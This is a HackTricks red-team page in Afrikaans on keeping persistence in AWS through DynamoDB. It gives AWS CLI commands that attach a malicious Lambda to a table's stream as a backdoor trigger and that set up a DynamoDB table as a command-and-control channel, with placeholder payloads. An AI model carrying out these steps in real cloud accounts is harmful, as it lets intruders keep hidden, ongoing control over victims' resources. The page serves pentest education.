AWS - DynamoDB Persistence

Leer AWS hakwerk vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

DynamoDB

Vir meer inligting, besoek:

AWS - DynamoDB Enum

DynamoDB Triggers met Lambda Agterdeur

Deur gebruik te maak van DynamoDB-triggers, kan 'n aanvaller 'n stiekeme agterdeur skep deur 'n skadelike Lambda-funksie met 'n tabel te assosieer. Die Lambda-funksie kan geaktiveer word wanneer 'n item bygevoeg, gewysig, of verwyder word, wat die aanvaller in staat stel om willekeurige kode binne die AWS-rekening uit te voer.

# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>

# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>

# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>

Om volharding te handhaaf, kan die aanvaller items in die DynamoDB-tabel skep of wysig, wat die skadelike Lambda-funksie sal aktiveer. Dit stel die aanvaller in staat om kode uit te voer binne die AWS-rekening sonder direkte interaksie met die Lambda-funksie.

DynamoDB as 'n C2-kanaal

'n Aanvaller kan 'n DynamoDB-tabel gebruik as 'n bevel- en beheer (C2) kanaal deur items te skep wat bevele bevat en gekaapte instansies of Lambda-funksies te gebruik om hierdie bevele te haal en uit te voer.

# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>

# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>

Die gekompromitteerde instansies of Lambda-funksies kan periodiek die C2-tabel vir nuwe bevele ondersoek, hulle uitvoer, en opsioneel die resultate terugvoer na die tabel. Dit stel die aanvaller in staat om volharding en beheer oor die gekompromitteerde bronne te behou.

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated